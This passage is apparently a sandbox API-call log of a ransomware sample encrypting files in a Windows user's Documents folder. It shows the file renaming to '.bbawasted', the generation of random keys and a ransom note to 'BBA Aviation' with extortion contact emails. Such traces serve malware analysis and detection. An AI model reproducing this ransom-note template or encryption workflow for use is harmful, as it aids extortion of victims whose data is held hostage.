KEY:\r\n[begin_key]dKLvfvcYJMp5GSxf5vmDXod4LRqTXtA3WbIJeiu12YcPavPgPRfiH06gN32ubfiI\r\nRczhqFaXwsJoBPNhvWoV/1wva40QTF0/o2WLYVgCosQkK1pWbFcNNVpNx5JU0W2o\r\nFbAH1JTBdmGgSq+8YZIU2HePXixYqoXFEj4LiI7SLdZDT2gNH/t4oc5h8RRDOTFc\r\nOADrciFJSPu0XtaRc8y4wvaYo9sxLK35P4Yj4GAPDMvETYLiZLdDC/Nd3cR7q0E1\r\nG/DX7IDFdNZ24jrHGQKaBZ7lBVtaLXJHwkIGMQHcgTA/P+Cdxi2tdbT4tSy+auCp\r\nHzweKIrTe5deXN+1kEZEot1cW3ycWHC7/Y5dexJvKJ8ENWayoiYXtH4HysYwptKa\r\n7Hsgb7OZ0StJIE6CWu2yWLnPilsroPhiY59Qpnh1MhkoprcIvjYbYQkdFBGN7L8F\r\n/xZieayX/iseOKxA+8sz1QNrjo/mmM/pw4Hu4QjfQmahlw3Wf90SB2y5S1Jr9tf9\r\njlbyy62GeDZZUo6BRjKLcV2eZc9GqrvlNSkGzbqQUzGz1KTPuMoljv4eJcJ+rvU3\r\ndEAs6TlHqQnp2DSdcJm/2zatlAfGhh/PrHGfqt6+aRAndQPdt6k2BwhSvlWsWW/C\r\niQqWetP7Q8IqUvRRHBCf/Pc2Z5ILuV2rFte0GA+JdTy=[end_key]\r\nKEEP IT\r\n") returned 984 [0212.796] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0212.796] WriteFile (in: hFile=0x27c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0212.796] SetEndOfFile (hFile=0x27c) returned 1 [0212.799] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0212.799] CloseHandle (hObject=0x27c) returned 1 [0212.804] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0212.804] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b0e20 | out: hHeap=0x660000) returned 1 [0212.804] _aulldvrm () returned 0x0 [0212.804] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6c58) returned 1 [0212.805] CryptGenRandom (in: hProv=0x6a6c58, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0212.805] CryptReleaseContext (hProv=0x6a6c58, dwFlags=0x0) returned 1 [0212.805] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Documents\\7qpgIY7ePsMtrN0.csv") returned 49 [0212.805] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x26c) returned 0x6a17c0 [0212.806] lstrcpyW (in: lpString1=0x6a1822, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0212.806] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0212.806] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a5f98) returned 1 [0212.806] CryptGenRandom (in: hProv=0x6a5f98, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0212.806] CryptReleaseContext (hProv=0x6a5f98, dwFlags=0x0) returned 1 [0212.806] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\7qpgIY7ePsMtrN0.csv.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\documents\\7qpgiy7epsmtrn0.csv.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0212.807] WriteFile (in: hFile=0x27c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0212.809] SetEndOfFile (hFile=0x27c) returned 1 [0213.408] SetFilePointer (in: hFile=0x27c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0213.408] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0213.408] lstrcpyW (in: lpString1=0x6a1822, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0213.408] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\7qpgIY7ePsMtrN0.csv" (normalized: "c:\\users\\fd1hvy\\documents\\7qpgiy7epsmtrn0.csv"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\7qpgIY7ePsMtrN0.csv.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\7qpgiy7epsmtrn0.csv.bbawasted")) returned 1 [0213.410] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\7qpgIY7ePsMtrN0.csv.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\7qpgiy7epsmtrn0.csv.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0213.410] CreateFileMappingW (hFile=0x28c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0213.410] GetFileSize (in: hFile=0x28c, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x11668 [0213.410] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11668) returned 0x5f0000 [0213.411] CloseHandle (hObject=0x28c) returned 1 [0213.416] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0213.417] CloseHandle (hObject=0x294) returned 1 [0213.417] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0213.417] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6928) returned 1 [0213.418] CryptGenRandom (in: hProv=0x6a6928, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0213.418] CryptReleaseContext (hProv=0x6a6928, dwFlags=0x0) returned 1 [0213.418] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6790) returned 1 [0213.419] CryptGenRandom (in: hProv=0x6a6790, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0213.419] CryptReleaseContext (hProv=0x6a6790, dwFlags=0x0) returned 1 [0213.475] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6c4b88 [0213.476] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0213.476] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0213.476] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]ELKn4DfMRXVCOxKN7IqsT+fWXAZT4GwYYOGwZmhhNlwFAc0TlScq4FF7FtFl4oH4\r\nca8MBJea1feKMCYZZjjDr/wdpzEJ3JxokF51bbMBFCau4O+RtDgfCbmhPrqlxgoA\r\nLXkFDHcyO1vORsgltXhfsCmyDXYrAtHsYpba5xA4RKQbXllFqFdLI/ZdmHqLf8rt\r\nxdNdreSjNym3QLMxyNGN42g6SSzs0lJMwmq4P6mNTt0agKWwM17WdPxdJfNfr0oS\r\nDzcla3gxS7PCVEmYN+KL4yQHDi77oAPCJ7RCppxzppTB1KgffS4Wyju6Xb/SuOFJ\r\nnohqN0Ee8x1C6SnLPV083PhOkIoLIwCFMcR928s+rfc+NDh8qz+ugbSo3jUtOKKZ\r\nwnQLxDK6hWt0cGxVQT9+D4eaIbWju9KSbAmNJmnGZGDSxQvoQRZ0NfS7BO9jz4eS\r\nqDugZi57IE95a3sI+4m0lNzp5Ox8U4Ri9H6rKjBGuKTpIiqjuPXuheGdetZ5D8uz\r\nV6ORPQyDHoZCanjiyUBe7g51LGphOGZZOXZu2L/eQXvw0KJGyn1JYZus/jMiQ20M\r\nKeHvqIWi/hQWcsU0AeFbEfXFDNPWQjusDgxZ2s2TL+rV76qN1xFynkP4MZOTadKi\r\nkaJIGC52sFHO1XuZ3g6V8XqI//Mtv32LlCT76tVe2FR=[end_key]\r\nKEEP IT\r\n") returned 984 [0213.476] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0213.476] WriteFile (in: hFile=0x27c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0213.476] SetEndOfFile (hFile=0x27c) returned 1 [0213.479] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0213.479] CloseHandle (hObject=0x27c) returned 1 [0213.484] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a17c0 | out: hHeap=0x660000) returned 1 [0213.484] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b1ff0 | out: hHeap=0x660000) returned 1 [0213.484] _aulldvrm () returned 0x0 [0213.484] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a5f98) returned 1 [0213.485] CryptGenRandom (in: hProv=0x6a5f98, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0213.485] CryptReleaseContext (hProv=0x6a5f98, dwFlags=0x0) returned 1 [0213.485] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Documents\\aOsMH3SFL_.odp") returned 44 [0213.485] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x262) returned 0x6c4b88 [0213.485] lstrcpyW (in: lpString1=0x6c4be0, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0213.486] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0213.486] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6240) returned 1 [0213.486] CryptGenRandom (in: hProv=0x6a6240, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0213.486] CryptReleaseContext (hProv=0x6a6240, dwFlags=0x0) returned 1 [0213.486] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\aOsMH3SFL_.odp.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\documents\\aosmh3sfl_.odp.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0213.487] WriteFile (in: hFile=0x27c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0213.488] SetEndOfFile (hFile=0x27c) returned 1 [0213.489] SetFilePointer (in: hFile=0x27c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0213.489] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0213.489] lstrcpyW (in: lpString1=0x6c4be0, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0213.489] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\aOsMH3SFL_.odp" (normalized: "c:\\users\\fd1hvy\\documents\\aosmh3sfl_.odp"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\aOsMH3SFL_.odp.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\aosmh3sfl_.odp.bbawasted")) returned 1 [0213.704] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\aOsMH3SFL_.odp.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\aosmh3sfl_.odp.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0213.705] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x288 [0213.705] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x16968 [0213.705] MapViewOfFile (hFileMappingObject=0x288, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x16968) returned 0x5f0000 [0213.705] CloseHandle (hObject=0x294) returned 1 [0213.714] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0213.715] CloseHandle (hObject=0x288) returned 1 [0213.715] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0213.715] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6350) returned 1 [0213.716] CryptGenRandom (in: hProv=0x6a6350, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0213.716] CryptReleaseContext (hProv=0x6a6350, dwFlags=0x0) returned 1 [0213.716] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6818) returned 1 [0213.717] CryptGenRandom (in: hProv=0x6a6818, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0213.717] CryptReleaseContext (hProv=0x6a6818, dwFlags=0x0) returned 1 [0213.727] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6aecf0 [0213.728] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0213.728] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0213.728] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]TG6fIv00dYeErKzrlj4n4+ymbtp5j3DDnZ9xF2m3v1EUhp6b+Xa1L+PhT5xPZ0wJ\r\nq+9YnB4ljShidxhyEX3B16lF8YvhCEiqV1TpERq/+X8Mm9qtmvgzN7FtoBxVh9g8\r\niSNbP7B2cr1fudVeuN8Wmxl+OaQFsOHc9QFz5REPybGyXtOW1eQcpUNFQ+VHA86c\r\njlImv3PcY2oVkTmoMykm9f+SBZKBV6v3rp+L7Ce01y8UkfHjkwioubgBFDjs1WNe\r\nuDxyWeEet88piIN5LoL3rkZQpAvebijGBCHciXobjUJlESFxS3ebwS/CV7djrOja\r\nam7Hn5u0zrjwJ2io/OlxEKi7Pd6HpbumTijWmT17kUiSyVZiCYO1QK+yK4GNltNp\r\nR0f8xdZYqfvYD1FnfRu2KTorR0YrbObrG1wWfnPonjIQkScZIPhwQJtCNgLcRJMy\r\nTXXY17fkgW2199+NQ4y4FcljNGKLm9Us1Hjx7IgRE5PhaFpUdzNkliOvh+zHGqOo\r\nLDQBbpMTI5UGP+i7KVuvEQdwiWYidUB6so3q35Fw+1eE0NDjKwr/EhVzWOH+OVRK\r\nmOTOUrYLifAbBRVPnu1weuZufVIVX17ib8nwYbIlhRb7Bv7wFPod/OR1lJs9sxMe\r\nmiZdVayxmhPC2G/y0r3rHeoDm8UlM3d14kUWQSZS2h1=[end_key]\r\nKEEP IT\r\n") returned 984 [0213.728] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0213.728] WriteFile (in: hFile=0x27c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0213.728] SetEndOfFile (hFile=0x27c) returned 1 [0213.731] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0213.731] CloseHandle (hObject=0x27c) returned 1 [0213.913] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0213.913] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6af478 | out: hHeap=0x660000) returned 1 [0213.913] _aulldvrm () returned 0x0 [0213.913] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a5f10) returned 1 [0213.915] CryptGenRandom (in: hProv=0x6a5f10, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0213.915] CryptReleaseContext (hProv=0x6a5f10, dwFlags=0x0) returned 1 [0213.915] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Documents\\E5MbZmyFdrzPsJX.ppt") returned 49 [0213.915] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x26c) returned 0x6a21e0 [0213.915] lstrcpyW (in: lpString1=0x6a2242, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0213.916] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0213.916] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6ce0) returned 1 [0213.916] CryptGenRandom (in: hProv=0x6a6ce0, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0213.916] CryptReleaseContext (hProv=0x6a6ce0, dwFlags=0x0) returned 1 [0213.916] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\E5MbZmyFdrzPsJX.ppt.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\documents\\e5mbzmyfdrzpsjx.ppt.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0213.918] WriteFile (in: hFile=0x290, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0213.920] SetEndOfFile (hFile=0x290) returned 1 [0213.921] SetFilePointer (in: hFile=0x290, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0213.921] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0213.921] lstrcpyW (in: lpString1=0x6a2242, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0213.921] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\E5MbZmyFdrzPsJX.ppt" (normalized: "c:\\users\\fd1hvy\\documents\\e5mbzmyfdrzpsjx.ppt"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\E5MbZmyFdrzPsJX.ppt.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\e5mbzmyfdrzpsjx.ppt.bbawasted")) returned 1 [0213.922] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\E5MbZmyFdrzPsJX.ppt.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\e5mbzmyfdrzpsjx.ppt.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0213.922] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x28c [0213.923] GetFileSize (in: hFile=0x27c, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x12f8c [0213.923] MapViewOfFile (hFileMappingObject=0x28c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x12f8c) returned 0x5f0000 [0213.923] CloseHandle (hObject=0x27c) returned 1 [0213.940] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0213.941] CloseHandle (hObject=0x28c) returned 1 [0213.941] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0213.941] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a65f8) returned 1 [0213.942] CryptGenRandom (in: hProv=0x6a65f8, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0213.942] CryptReleaseContext (hProv=0x6a65f8, dwFlags=0x0) returned 1 [0213.943] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6818) returned 1 [0213.943] CryptGenRandom (in: hProv=0x6a6818, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0213.943] CryptReleaseContext (hProv=0x6a6818, dwFlags=0x0) returned 1 [0213.953] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6c4b88 [0213.954] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0213.954] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0213.954] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]AsXWRu/0E1zDcnVKsPEJ/GZXWff7d5HAtKJCE5BoIfXcUy1TyaI00/o5d0gYcO8m\r\nKo/yVYwmekWoRJ/gnY3tK6rJKauJZlpYTmx1WJHGB6pkCJovcVq8RZFHppbQxE/Z\r\nfxqXIkt2/iVmkjLGXdH7wLfxxI1+VO5r97Ez5PhW4tGBlSBJtMHr6pWeSMKBMSi1\r\n2mWeHZ3jMJVFx8PtPbL/b6LhCkbj0FuFN877p+gAUtMEFOdHS0zPjMAOWSwVMvy/\r\nyc4wYPobjp877TDcmrkRIF1UAvNvGTj7pWd0oBxFexcVxhdQ92sOFX6Xil9Gu59V\r\nBiOi4eM61ZyCIxJWH9cSmo0Phgs1M6EnvrrgqIxzNdCNuM4PaClA8gX9MrlK1zvz\r\n/ZgKD5f0yBQGaLZpho3RWTVMW38Eaip7A9qOJy4peGOar40lCtGWpQxp8Tq4dAR2\r\n0w9nT1ScBF1SwAQoSNwj4XkKy2+TtoaTS+nglOIoQ3fvmoUnrgORm7yZFK4iZkoE\r\nIg5DlI7mbF18EnaARXvjCb/6FTYdQhS4EWBc0k+5y5OWdIW+8fiBHAFMiP3loM4s\r\n8SG3jpoRIKoBoAqCl9HyJqksoDjMRGUl57GQ7KKbKpOkHVOYpYsjSPuAbLUqyx8H\r\nEmEmdGk3etCyx+nPGM+bepBs/VgN5ehaIo5+p7O56iu=[end_key]\r\nKEEP IT\r\n") returned 984 [0213.954] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0213.954] WriteFile (in: hFile=0x290, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0213.954] SetEndOfFile (hFile=0x290) returned 1 [0213.956] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0213.956] CloseHandle (hObject=0x290) returned 1 [0214.161] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a21e0 | out: hHeap=0x660000) returned 1 [0214.162] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b19f0 | out: hHeap=0x660000) returned 1 [0214.162] _aulldvrm () returned 0x0 [0214.162] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6350) returned 1 [0214.162] CryptGenRandom (in: hProv=0x6a6350, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0214.162] CryptReleaseContext (hProv=0x6a6350, dwFlags=0x0) returned 1 [0214.162] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Ihh5mnxu_Eje34 R8Df5.xlsx") 